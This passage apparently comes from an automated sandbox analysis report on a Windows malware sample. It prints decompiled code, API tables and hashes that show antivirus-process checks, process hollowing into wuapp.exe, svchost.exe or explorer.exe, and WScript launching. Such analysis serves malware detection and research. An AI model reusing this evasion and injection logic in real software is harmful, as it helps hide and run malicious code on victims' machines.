				_t62 = E00407EF0("cfp.exe"); // executed
				_t84 = _t84 + 4;
				if(_t62 != 0) {
					goto L10;
				}
				_t63 = E00407EF0("ccavsrv.exe"); // executed
				_t84 = _t84 + 4;
				if(_t63 != 0) {
					goto L10;
				}
				_t64 = E00407EF0("cmdagent.exe"); // executed
				_t84 = _t84 + 4;
				if(_t64 != 0) {
					goto L10;
				}
				_t65 = E00407EF0("avp.exe"); // executed
				_t84 = _t84 + 4;
				if(_t65 != 0) {
					goto L10;
				}
				_t66 = E00407EF0("avpui.exe"); // executed
				_t84 = _t84 + 4;
				if(_t66 != 0) {
					goto L10;
				}
				_t67 = E00407EF0("ksde.exe"); // executed
				_t82 = _t84 + 4;
				if(_t67 == 0) {
					goto L22;
				}
				goto L10;
			}
































                                                                                                        0x00406a40
                                                                                                        0x00406a58
                                                                                                        0x00406a68
                                                                                                        0x00406a72
                                                                                                        0x00406a85
                                                                                                        0x00406a8a
                                                                                                        0x00406a95
                                                                                                        0x00406a9b
                                                                                                        0x00406aa0
                                                                                                        0x00406aa5
                                                                                                        0x00406c9a
                                                                                                        0x00406c9a
                                                                                                        0x00406aab
                                                                                                        0x00406aac
                                                                                                        0x00406ab4
                                                                                                        0x00406c0e
                                                                                                        0x00406c16
                                                                                                        0x00406c21
                                                                                                        0x00406c2a
                                                                                                        0x00406c2e
                                                                                                        0x00406c3b
                                                                                                        0x00406c4c
                                                                                                        0x00406c52
                                                                                                        0x00406c5c
                                                                                                        0x00406c7e
                                                                                                        0x00406c8d
                                                                                                        0x00406c92
                                                                                                        0x00406c92
                                                                                                        0x00406c94
                                                                                                        0x00000000
                                                                                                        0x00406c95
                                                                                                        0x00406abf
                                                                                                        0x00406ac4
                                                                                                        0x00406ac9
                                                                                                        0x00406b46
                                                                                                        0x00406b53
                                                                                                        0x00406b58
                                                                                                        0x00406b59
                                                                                                        0x00406bd6
                                                                                                        0x00406bf8
                                                                                                        0x00406bfd
                                                                                                        0x00406c02
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406c02
                                                                                                        0x00406b5b
                                                                                                        0x00406b62
                                                                                                        0x00406b64
                                                                                                        0x00406b69
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406b6f
                                                                                                        0x00406b73
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406b80
                                                                                                        0x00406b88
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406b8a
                                                                                                        0x00406b99
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406bb6
                                                                                                        0x00406bbb
                                                                                                        0x00406bc0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406bcc
                                                                                                        0x00406bcc
                                                                                                        0x00406bcd
                                                                                                        0x00406bd1
                                                                                                        0x00000000
                                                                                                        0x00406bd1
                                                                                                        0x00406ad0
                                                                                                        0x00406ad5
                                                                                                        0x00406ada
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406ae1
                                                                                                        0x00406ae6
                                                                                                        0x00406aeb
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406af2
                                                                                                        0x00406af7
                                                                                                        0x00406afc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406b03
                                                                                                        0x00406b08
                                                                                                        0x00406b0d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406b14
                                                                                                        0x00406b19
                                                                                                        0x00406b1e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406b25
                                                                                                        0x00406b2a
                                                                                                        0x00406b2f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406b36
                                                                                                        0x00406b3b
                                                                                                        0x00406b40
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                          • Part of subcall function 00407ED0: GetFileAttributesW.KERNELBASE(?,?,004031D3,004047C4,004047C4,\System32\wuapp.exe,004047C4,?,00000000), ref: 00407ED6
                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00406B91
                                                                                                          • Part of subcall function 00407EF0: Process32First.KERNEL32(00000000,00000128), ref: 00407F24
                                                                                                          • Part of subcall function 00407EF0: Process32Next.KERNEL32 ref: 00407F48
                                                                                                          • Part of subcall function 00407EF0: Process32Next.KERNEL32 ref: 00407F6D
                                                                                                          • Part of subcall function 00407EF0: FindCloseChangeNotification.KERNELBASE(00000000,00000000,00000128,00000001,?), ref: 00407F77
                                                                                                          • Part of subcall function 00407EF0: CloseHandle.KERNEL32(00000000,00000001,?), ref: 00407F86
                                                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406C7E
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,7519F7F0,00000000), ref: 00406C8D
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,7519F7F0,00000000), ref: 00406C92
                                                                                                          • Part of subcall function 00407EF0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00407F08
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close$HandleProcess32$CreateNextProcess$AttributesChangeCurrentFileFindFirstNotificationSnapshotToolhelp32
                                                                                                        • String ID: avp.exe$avpui.exe$bdagent.exe$ccavsrv.exe$cfp.exe$cmd.exe /C WScript "$cmdagent.exe$ksde.exe$vsserv.exe
                                                                                                        • API String ID: 784547097-1880040858
                                                                                                        • Opcode ID: 24b9ef2d03520a240ba7983f71be88e308f8bb269f8d39a6f0d3ebb9ed5b5bb1
                                                                                                        • Instruction ID: e8651156ccd0aa44593a489e188d373cfd9c837c14a664b72568e472e4b0eebb
                                                                                                        • Opcode Fuzzy Hash: 24b9ef2d03520a240ba7983f71be88e308f8bb269f8d39a6f0d3ebb9ed5b5bb1
                                                                                                        • Instruction Fuzzy Hash: 97512071D4030565FB209A519D47FAB727D5B00788F14007BB905B11C2FBBDBE54866E
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405E60, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 300sleepprocessmemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 81%
                                                                                                        			E00405E60(void* __ecx, signed int __edx, void* __eflags) {
				intOrPtr _v8;
				signed int _v16;
				signed int _v20;
				void* _v24;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v44;
				char _v48;
				signed int _v56;
				char _v60;
				char _v132;
				intOrPtr _v1232;
				intOrPtr _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				intOrPtr _v1324;
				char _v1372;
				signed int _t99;
				int _t107;
				void* _t109;
				void* _t116;
				intOrPtr _t117;
				signed int _t118;
				signed int _t122;
				void* _t132;
				void* _t145;
				void* _t151;
				void* _t153;
				void* _t154;
				signed int _t159;
				void* _t173;
				intOrPtr _t174;
				signed int _t175;
				signed int _t176;
				intOrPtr* _t181;
				signed int _t182;
				intOrPtr* _t185;
				signed int _t188;
				intOrPtr* _t192;
				void* _t199;
				void* _t204;
				void* _t205;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t223;
				signed int _t225;

				_t175 = __edx;
				_t154 = __ecx;
				_t153 = _t199;
				_v8 =  *((intOrPtr*)(_t153 + 4));
				E00401BB0( &_v1372, 0, 0x4d0);
				_t185 =  *((intOrPtr*)(_t153 + 8));
				_t204 = (_t199 - 0x00000008 & 0xfffffff0) + 4 - 0x558 + 0xc;
				_v1324 = 0x100002;
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x30], xmm0");
				_t215 =  *_t185 - 0x5a4d;
				if( *_t185 != 0x5a4d) {
					E00401CE0("0125789244697858", 0x10, _t185,  *((intOrPtr*)(_t153 + 0xc)));
					_t204 = _t204 + 0x10;
				}
				_t99 = E00401E50(_t154, _t175, _t215, "ntdll.dll");
				_v20 = _t99;
				_t205 = _t204 + 4;
				_v16 = _t175;
				_t156 = _t99 | _t175;
				if((_t99 | _t175) == 0 ||  *_t185 != 0x5a4d) {
					L34:
					__eflags = 0;
					return 0;
				} else {
					_t181 =  *((intOrPtr*)(_t185 + 0x3c)) + _t185;
					if( *_t181 != 0x4550) {
						goto L34;
					} else {
						E00401670( &_v132, 0, 0x44);
						E00401670( &_v40, 0, 0x10);
						_t208 = _t205 + 0x18;
						_v132 = 0x44;
						_push( &_v40);
						_push( &_v132);
						_push(0);
						_push(0);
						if( *0x5d1bb8 == 0) {
							_push(4);
						} else {
							_push(0x800000c);
						}
						_t107 = CreateProcessW(0,  *(_t153 + 0x10), 0, 0, 0, ??, ??, ??, ??, ??); // executed
						_t220 = _t107;
						if(_t107 == 0) {
							goto L34;
						} else {
							_t109 = E004061F0(_t156, _t175, _t220, _v20, _v16, _v36,  &_v1372); // executed
							_t209 = _t208 + 0x10;
							_t221 = _t109;
							if(_t109 == 0) {
								L33:
								TerminateProcess(_v40, 0);
								CloseHandle(_v36);
								CloseHandle(_v40);
								goto L34;
							} else {
								asm("adc eax, 0x0");
								_t116 = E00406250(_v1236 + 0x10, _t175, _t221, _v20, _v16, _v40, _v1236 + 0x10, _v1232,  &_v60, 8,  &_v24); // executed
								_t210 = _t209 + 0x20;
								if(_t116 == 0) {
									goto L33;
								} else {
									_t159 =  *((intOrPtr*)(_t181 + 0x34));
									_t176 = _v56;
									_t117 =  *((intOrPtr*)(_t181 + 0x30));
									_v20 = _t159;
									_t223 = _t176 - _t159;
									if(_t223 < 0) {
										L18:
										_t118 = E004072C0(_t227, _v40,  *((intOrPtr*)(_t181 + 0x30)),  *((intOrPtr*)(_t181 + 0x34)),  *((intOrPtr*)(_t181 + 0x50)), 0x3000, 4);
										_v20 = _t118;
										_v16 = _t176;
										if((_t118 | _t176) == 0 || E004074D0( &_v44, _t176, _v40, _t118, _t176, _t185,  *((intOrPtr*)(_t181 + 0x54)),  &_v44) == 0) {
											goto L33;
										} else {
											_t188 = _v20;
											if(E004073C0(_v40, _t188, _v16,  *((intOrPtr*)(_t181 + 0x54)), 2,  &_v48) == 0) {
												goto L33;
											} else {
												_t122 =  *(_t181 + 0x14) & 0x0000ffff;
												_v24 = 0;
												if(0 >=  *(_t181 + 6)) {
													L27:
													asm("adc eax, 0x0");
													if(E004074D0(_v1236 + 0x10, _t176, _v40, _v1236 + 0x10, _v1232, _t181 + 0x30, 8,  &_v44) == 0) {
														goto L33;
													} else {
														_t182 = _v16;
														_v1244 =  *((intOrPtr*)(_t181 + 0x28)) + _t188;
														asm("adc ecx, edi");
														_v1240 = 0;
														if(E00407230(0, _t176, _v36,  &_v1372) == 0 || E004071A0(0, _t176, _v36) == 0) {
															goto L33;
														} else {
															Sleep(0x1388); // executed
															_t132 = VirtualAlloc(0, 0x138, 0x3000, 4); // executed
															_v24 = _t132;
															if(_t132 != 0) {
																E00401BB0(_t132, 0, 0x138);
																E004074D0(0, _t176, _v40, _t188, _t182, _v24, 0x138,  &_v16);
																VirtualFree(_v24, 0, 0x8000); // executed
															}
															FindCloseChangeNotification(_v36); // executed
															CloseHandle(_v40);
															return _v32;
														}
													}
												} else {
													_t192 = _t181 + 0x2c + _t122;
													while(1) {
														asm("adc eax, [ebp-0x4]");
														if(E004074D0( *((intOrPtr*)(_t192 - 8)) + _v20, _t176, _v40,  *((intOrPtr*)(_t192 - 8)) + _v20, 0,  *_t192 +  *((intOrPtr*)(_t153 + 8)),  *((intOrPtr*)(_t192 - 4)),  &_v44) == 0) {
															goto L33;
														}
														_t145 = E00406300( *((intOrPtr*)(_t192 + 0x10)));
														_t210 = _t210 + 4;
														asm("adc eax, [ebp-0x4]");
														if(E004073C0(_v40,  *((intOrPtr*)(_t192 - 8)) + _v20, 0,  *((intOrPtr*)(_t192 - 0xc)), _t145,  &_v48) == 0) {
															goto L33;
														} else {
															_t192 = _t192 + 0x28;
															_t173 = _v24 + 1;
															_v24 = _t173;
															if(_t173 < ( *(_t181 + 6) & 0x0000ffff)) {
																continue;
															} else {
																_t188 = _v20;
																goto L27;
															}
														}
														goto L35;
													}
													goto L33;
												}
											}
										}
									} else {
										_t174 = _v60;
										if(_t223 > 0 || _t174 >= _t117) {
											_v16 =  *((intOrPtr*)(_t181 + 0x50));
											_v16 = _v16 +  *((intOrPtr*)(_t181 + 0x30));
											_t185 =  *((intOrPtr*)(_t153 + 8));
											asm("adc eax, [ebp-0x8]");
											_t225 = _t176;
											if(_t225 > 0 || _t225 >= 0 && _t174 > _v16) {
												goto L18;
											} else {
												_t151 = E00407120(_t176, _v40, _t174, _t176);
												_t227 = _t151;
												if(_t151 != 0) {
													goto L33;
												} else {
													goto L18;
												}
											}
										} else {
											goto L18;
										}
									}
								}
							}
						}
					}
				}
				L35:
			}



















































                                                                                                        0x00405e60
                                                                                                        0x00405e60
                                                                                                        0x00405e61
                                                                                                        0x00405e70
                                                                                                        0x00405e8c
                                                                                                        0x00405e91
                                                                                                        0x00405e99
                                                                                                        0x00405e9c
                                                                                                        0x00405ea6
                                                                                                        0x00405ea9
                                                                                                        0x00405eae
                                                                                                        0x00405eb1
                                                                                                        0x00405ebe
                                                                                                        0x00405ec3
                                                                                                        0x00405ec3
                                                                                                        0x00405ecb
                                                                                                        0x00405ed2
                                                                                                        0x00405ed5
                                                                                                        0x00405ed8
                                                                                                        0x00405edb
                                                                                                        0x00405edd
                                                                                                        0x004061de
                                                                                                        0x004061df
                                                                                                        0x004061e8
                                                                                                        0x00405eec
                                                                                                        0x00405eef
                                                                                                        0x00405ef7
                                                                                                        0x00000000
                                                                                                        0x00405efd
                                                                                                        0x00405f05
                                                                                                        0x00405f12
                                                                                                        0x00405f17
                                                                                                        0x00405f1a
                                                                                                        0x00405f2b
                                                                                                        0x00405f2f
                                                                                                        0x00405f30
                                                                                                        0x00405f32
                                                                                                        0x00405f34
                                                                                                        0x00405f3d
                                                                                                        0x00405f36
                                                                                                        0x00405f36
                                                                                                        0x00405f36
                                                                                                        0x00405f4a
                                                                                                        0x00405f50
                                                                                                        0x00405f52
                                                                                                        0x00000000
                                                                                                        0x00405f58
                                                                                                        0x00405f68
                                                                                                        0x00405f6d
                                                                                                        0x00405f70
                                                                                                        0x00405f72
                                                                                                        0x004061c3
                                                                                                        0x004061c8
                                                                                                        0x004061d7
                                                                                                        0x004061dc
                                                                                                        0x00000000
                                                                                                        0x00405f78
                                                                                                        0x00405f91
                                                                                                        0x00405f9f
                                                                                                        0x00405fa4
                                                                                                        0x00405fa9
                                                                                                        0x00000000
                                                                                                        0x00405faf
                                                                                                        0x00405faf
                                                                                                        0x00405fb2
                                                                                                        0x00405fb5
                                                                                                        0x00405fb8
                                                                                                        0x00405fbb
                                                                                                        0x00405fbd
                                                                                                        0x00405ff9
                                                                                                        0x0040600c
                                                                                                        0x00406013
                                                                                                        0x00406018
                                                                                                        0x0040601b
                                                                                                        0x00000000
                                                                                                        0x0040603b
                                                                                                        0x0040603b
                                                                                                        0x00406055
                                                                                                        0x00000000
                                                                                                        0x0040605b
                                                                                                        0x0040605b
                                                                                                        0x00406061
                                                                                                        0x0040606c
                                                                                                        0x004060e2
                                                                                                        0x004060fb
                                                                                                        0x0040610a
                                                                                                        0x00000000
                                                                                                        0x00406110
                                                                                                        0x00406115
                                                                                                        0x0040611a
                                                                                                        0x0040612a
                                                                                                        0x0040612c
                                                                                                        0x00406139
                                                                                                        0x00000000
                                                                                                        0x0040614b
                                                                                                        0x00406150
                                                                                                        0x00406164
                                                                                                        0x0040616a
                                                                                                        0x0040616f
                                                                                                        0x00406179
                                                                                                        0x00406192
                                                                                                        0x004061a1
                                                                                                        0x004061a1
                                                                                                        0x004061b0
                                                                                                        0x004061b5
                                                                                                        0x004061c2
                                                                                                        0x004061c2
                                                                                                        0x00406139
                                                                                                        0x0040606e
                                                                                                        0x00406071
                                                                                                        0x00406073
                                                                                                        0x00406088
                                                                                                        0x00406097
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004060a0
                                                                                                        0x004060a5
                                                                                                        0x004060b8
                                                                                                        0x004060c7
                                                                                                        0x00000000
                                                                                                        0x004060cd
                                                                                                        0x004060d0
                                                                                                        0x004060d7
                                                                                                        0x004060d8
                                                                                                        0x004060dd
                                                                                                        0x00000000
                                                                                                        0x004060df
                                                                                                        0x004060df
                                                                                                        0x00000000
                                                                                                        0x004060df
                                                                                                        0x004060dd
                                                                                                        0x00000000
                                                                                                        0x004060c7
                                                                                                        0x00000000
                                                                                                        0x00406073
                                                                                                        0x0040606c
                                                                                                        0x00406055
                                                                                                        0x00405fbf
                                                                                                        0x00405fbf
                                                                                                        0x00405fc2
                                                                                                        0x00405fce
                                                                                                        0x00405fd3
                                                                                                        0x00405fd6
                                                                                                        0x00405fd9
                                                                                                        0x00405fdc
                                                                                                        0x00405fde
                                                                                                        0x00000000
                                                                                                        0x00405fe7
                                                                                                        0x00405fec
                                                                                                        0x00405ff1
                                                                                                        0x00405ff3
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405ff3
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc2
                                                                                                        0x00405fbd
                                                                                                        0x00405fa9
                                                                                                        0x00405f72
                                                                                                        0x00405f52
                                                                                                        0x00405ef7
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,0800000C,00000000,00000000,00000044,?), ref: 00405F4A
                                                                                                        • Sleep.KERNELBASE(00001388,?,?,?,?,?,?,?,00000008,?,?,?,?,?,00000002,?), ref: 00406150
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000138,00003000,00000004,?,?,?,?,?,?,?,?,00003000,00000004), ref: 00406164
                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,00000000,00000138,?,?,00003000,00000004), ref: 004061A1
                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,00003000,00000004), ref: 004061B0
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00003000,00000004), ref: 004061B5
                                                                                                          • Part of subcall function 004074D0: GetCurrentProcess.KERNEL32(00000000,?,00000000,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 004074FF
                                                                                                          • Part of subcall function 004073C0: GetCurrentProcess.KERNEL32(?,?,?,00000002,?,?,00000000,?,?,?,?,?,?), ref: 00407429
                                                                                                        • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,I@,?), ref: 004061C8
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,I@,?), ref: 004061D7
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,I@,?), ref: 004061DC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseProcess$Handle$CurrentVirtual$AllocChangeCreateFindFreeNotificationSleepTerminate
                                                                                                        • String ID: 0125789244697858$ntdll.dll$I@
                                                                                                        • API String ID: 3897173628-1460664302
                                                                                                        • Opcode ID: 0a380abd92552f4928be6177836d68444a34bb84d15ef365db8cee4c191364a7
                                                                                                        • Instruction ID: 1d2188587597bc53f96400c66c54050a6bc471ffeb9cfe25592a30c854cca956
                                                                                                        • Opcode Fuzzy Hash: 0a380abd92552f4928be6177836d68444a34bb84d15ef365db8cee4c191364a7
                                                                                                        • Instruction Fuzzy Hash: E9B18071D00209BBEF109B95CD41FAEBBB9FF04304F14406AFA05B62D1E779A960DB98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00407FA0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 56libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 36%
                                                                                                        			E00407FA0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				void* _t17;
				struct HINSTANCE__* _t22;

				_t22 = LoadLibraryA("Shell32.dll");
				if(_t22 == 0) {
					L8:
					return 0;
				} else {
					_t11 = GetProcAddress(_t22, "SHGetKnownFolderPath");
					if(_t11 == 0) {
						_t12 = GetProcAddress(_t22, "SHGetFolderPathW");
						if(_t12 == 0) {
							goto L7;
						} else {
							_push(_a4);
							_push(0);
							_push(0);
							_push(_a12);
							_push(0);
							if( *_t12() == 0) {
								goto L4;
							} else {
								goto L7;
							}
						}
					} else {
						_v8 = 0;
						_t17 =  *_t11(_a8, 0, 0,  &_v8); // executed
						if(_t17 != 0) {
							L7:
							FreeLibrary(_t22);
							goto L8;
						} else {
							E00401A00(_a4, _v8);
							__imp__CoTaskMemFree(_v8);
							L4:
							FreeLibrary(_t22);
							return 1;
						}
					}
				}
			}








                                                                                                        0x00407fb0
                                                                                                        0x00407fb4
                                                                                                        0x0040802f
                                                                                                        0x00408035
                                                                                                        0x00407fb6
                                                                                                        0x00407fbc
                                                                                                        0x00407fc4
                                                                                                        0x0040800c
                                                                                                        0x00408014
                                                                                                        0x00000000
                                                                                                        0x00408016
                                                                                                        0x00408016
                                                                                                        0x00408019
                                                                                                        0x0040801b
                                                                                                        0x0040801d
                                                                                                        0x00408020
                                                                                                        0x00408026
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00408026
                                                                                                        0x00407fc6
                                                                                                        0x00407fc9
                                                                                                        0x00407fd8
                                                                                                        0x00407fdc
                                                                                                        0x00408028
                                                                                                        0x00408029
                                                                                                        0x00000000
                                                                                                        0x00407fde
                                                                                                        0x00407fe4
                                                                                                        0x00407fef
                                                                                                        0x00407ff5
                                                                                                        0x00407ff6
                                                                                                        0x00408005
                                                                                                        0x00408005
                                                                                                        0x00407fdc
                                                                                                        0x00407fc4

                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(Shell32.dll,00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00407FAA
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00407FBC
                                                                                                        • CoTaskMemFree.OLE32(00000000,0040AAE0), ref: 00407FEF
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00407FF6
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040800C
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00408029
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary$AddressProc$LoadTask
                                                                                                        • String ID: SHGetFolderPathW$SHGetKnownFolderPath$Shell32.dll
                                                                                                        • API String ID: 2437428030-337183102
                                                                                                        • Opcode ID: ab5138febe831b5d3af195338a01a6775a2fe4f8e8e9f4456204fd6712aeb4cb
                                                                                                        • Instruction ID: 5a5f59212e9234ed04b8ab6130e8ec1b5f2c4e940e4abc4082f6536912f10ee2
                                                                                                        • Opcode Fuzzy Hash: ab5138febe831b5d3af195338a01a6775a2fe4f8e8e9f4456204fd6712aeb4cb
                                                                                                        • Instruction Fuzzy Hash: 6901F531640205BBDB215F60DE0AB9E3BA8EF08741F104035FD04B41E1EFB9DE249A9D
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00403150, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 72COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00403150(intOrPtr _a4) {
				short _v524;
				int _t6;
				void* _t11;
				void* _t16;
				char* _t17;
				char* _t18;

				if( *0x5d1314 == 0) {
					if( *0x5d1318 == 0) {
						_t17 = L"\\System32\\wuapp.exe";
						_t18 = L"\\System32\\svchost.exe";
					} else {
						goto L4;
					}
				} else {
					if( *0x5d1318 != 0) {
						L4:
						_t17 = L"\\SysWOW64\\wuapp.exe";
						_t18 = L"\\SysWOW64\\svchost.exe";
					} else {
						_t17 = L"\\notepad.exe";
						_t18 = L"\\explorer.exe";
					}
				}
				_t6 = GetWindowsDirectoryW( &_v524, 0x104);
				if(_t6 == 0 || _t6 > 0x104) {
					return 0;
				} else {
					_t20 = _a4;
					E00401A00(_a4,  &_v524);
					E00401970(_a4, _t17);
					_t11 = E00407ED0(_t20); // executed
					if(_t11 != 0) {
						L11:
						return 1;
					} else {
						E00401A00(_t20,  &_v524);
						E00401970(_t20, _t18);
						_t16 = E00407ED0(_t20);
						if(_t16 != 0) {
							goto L11;
						} else {
							return _t16;
						}
					}
				}
			}









                                                                                                        0x00403162
                                                                                                        0x00403180
                                                                                                        0x0040318e
                                                                                                        0x00403193
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00403164
                                                                                                        0x0040316b
                                                                                                        0x00403182
                                                                                                        0x00403182
                                                                                                        0x00403187
                                                                                                        0x0040316d
                                                                                                        0x0040316d
                                                                                                        0x00403172
                                                                                                        0x00403172
                                                                                                        0x0040316b
                                                                                                        0x004031a4
                                                                                                        0x004031ac
                                                                                                        0x00403215
                                                                                                        0x004031b5
                                                                                                        0x004031b6
                                                                                                        0x004031c1
                                                                                                        0x004031c8
                                                                                                        0x004031ce
                                                                                                        0x004031d8
                                                                                                        0x00403202
                                                                                                        0x0040320d
                                                                                                        0x004031da
                                                                                                        0x004031e2
                                                                                                        0x004031e9
                                                                                                        0x004031ef
                                                                                                        0x004031f9
                                                                                                        0x00000000
                                                                                                        0x004031fb
                                                                                                        0x00403201
                                                                                                        0x00403201
                                                                                                        0x004031f9
                                                                                                        0x004031d8

                                                                                                        APIs
                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104,75144D40,00000000), ref: 004031A4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DirectoryWindows
                                                                                                        • String ID: \SysWOW64\svchost.exe$\SysWOW64\wuapp.exe$\System32\svchost.exe$\System32\wuapp.exe$\explorer.exe$\notepad.exe
                                                                                                        • API String ID: 3619848164-3654143111
                                                                                                        • Opcode ID: 58585422758d50ecb61684f8bac33cdbd10527928f2f89fb89a2ae6478207968
                                                                                                        • Instruction ID: 5271e3ad36bb831133aa074bfbbea18cf9a940d0c74e058bf0f41e493ec8db13
                                                                                                        • Opcode Fuzzy Hash: 58585422758d50ecb61684f8bac33cdbd10527928f2f89fb89a2ae6478207968
                                                                                                        • Instruction Fuzzy Hash: 8B112B71A0220467D7206A15AC45BAB775CCB0535AF1405BBFD08F62E3D73E9F8582DE
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404DE0, Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 152sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 93%
                                                                                                        			E00404DE0(short __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				char _v1784;
				intOrPtr _v1788;
				char _v1792;
				intOrPtr _v1796;
				char _v2052;
				intOrPtr _v2056;
				char _v2568;
				char _v3080;
				intOrPtr _v3084;
				char _v3148;
				char _v3276;
				intOrPtr _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t46;
				char _t52;
				char _t62;
				void* _t76;
				short _t79;
				void* _t84;
				intOrPtr _t85;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t92;
				void* _t93;

				_t93 = __eflags;
				_t80 = __edx;
				_t79 = __ecx;
				E00401670( &_v3276, 0, 0xcc8);
				_t41 =  *0x5d1bb4; // 0x1e
				_t81 = _a4;
				_v2056 = _t41;
				_t42 =  *0x5d1bbc; // 0xa
				_v1796 = _t42;
				_t43 =  *0x5d1c24; // 0x0
				_v1788 = _t43;
				_t44 = E00404B00(_t79, __edx, _t93, _a4); // executed
				_t84 = _t44;
				_t87 = _t86 + 0x10;
				_t94 = _t84;
				if(_t84 != 0) {
					L5:
					_t46 = E004028F0(_t84, E00405000,  &_v3276);
					_t88 = _t87 + 0xc;
					_push(_t84);
					if(_t46 >= 0) {
						E00401510();
						_t85 = _a12;
						_t89 = _t88 + 4;
						__eflags = _v2052;
						if(_v2052 != 0) {
							E004017E0(_t85 + 0x4c8,  &_v2052);
							_t89 = _t89 + 8;
						}
						__eflags = _v3276;
						if(_v3276 != 0) {
							E004017E0(_t85,  &_v3276);
							_t89 = _t89 + 8;
						}
						__eflags = _v3148;
						if(_v3148 != 0) {
							E004017E0(_t85 + 0x80,  &_v3148);
							_t89 = _t89 + 8;
